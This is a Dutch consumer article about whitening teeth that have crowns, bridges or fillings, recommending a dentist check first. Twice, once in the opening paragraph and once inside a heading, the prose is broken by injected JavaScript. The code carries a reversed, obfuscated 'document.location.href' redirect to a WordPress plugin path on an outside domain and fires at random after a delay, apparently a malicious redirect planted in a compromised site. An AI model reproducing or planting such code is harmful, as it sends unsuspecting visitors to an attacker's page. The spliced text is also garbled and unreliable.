Ik heb een brug of kroon maar wil mijn tanden bleken. Kan dat?

Vroeger toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toen je klein was lekker gespeeld met een skateboard en hard onderuit gegaan? Voortanden verloren of een andere tand afgebroken? Dan heb je een grote kans dat je gebit niet door de tandarts aangepast is met mogelijk een kroon of brug. Alle tanden die voorzien zijn van een kroon of brug die kan je niet bleken. Ik dacht laat ik maar meteen met de deur in huis vallen, maar dan is het ook niet aan te raden om het te proberen. Je mag altijd hier de keuze zelf maken en de kans dat het stukje “nep” tand niet mee kleurt zal aanzienlijk zijn. Dit zal het bleek effect niet voor de overige tanden ten niet doen, maar geeft wel een apart resultaat.

Je hebt een kroon en wilt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch bleken?

Dit is een van de meest gestelde vragen in onze mailbox. Kan een kroon gebleekt worden of een vulling? Van te voren informeren naar de mogelijkheden is ontzettend belangrijk bij het bleken van je tanden. Zeker als het achteraf mis gaat wat bijna niet voorkomt is het raadzaam om je gebit te beschermen tegen beschadigingen. Wil je weten hoe je kan voorkomen dat je tanden geel worden, lees dan ons artikel over hoe je gele tanden kan voorkomen op onze website.

Gaatjes en vulling? Kan ik dan nog bleken?

Bijna iedereen die nu naar de tandarts gaat en een gaatje wil vullen, krijgt geen gekleurde vulling meer maar een passienten. Dit is een witte vulling en geeft een veel mooier resultaat ipv de gouden en zilveren vullingen die vroeger veel gebruikt werden. De vulling die in je mond zit zal niet meekleuren als je jouw tanden bleekt. Dit komt omdat het niet je eigen tand is. Met een witte vulling zal dit minder opvallen dan de zilveren of gouden vullingen. De witte vulling zal in de loop van de tijd ook verkleuren, maar dit kan je bij de tandarts laten aanpassen.

Als je niet vaak naar de tandarts gaat en probeert hierop te besparen. Dan zouden wij je willen aanraden voordat je jouw tanden gaat bleken eerst een bezoek te brengen aan de tandarts. Mocht je gaatjes hebben dan kan die ze dichten, want het bleken van je gebit met een gaatje is echt niet verstandig. Dit kan vreselijk veel pijn doen.

Hier wil ik eigenlijk geen apart kopje van maken, maar met bruggen geldt eigenlijk hetzelfde als bij kronen. Deze zullen niet meekleuren en zullen naderhand door de tandarts aangepast moeten worden. Dit is natuurlijk heel vervelend als dit je aanblik aantast. Je gebit zal niet mooi meer zijn en de verkleuring zal verschillen per gebruiker, maar dit wil je echt niet.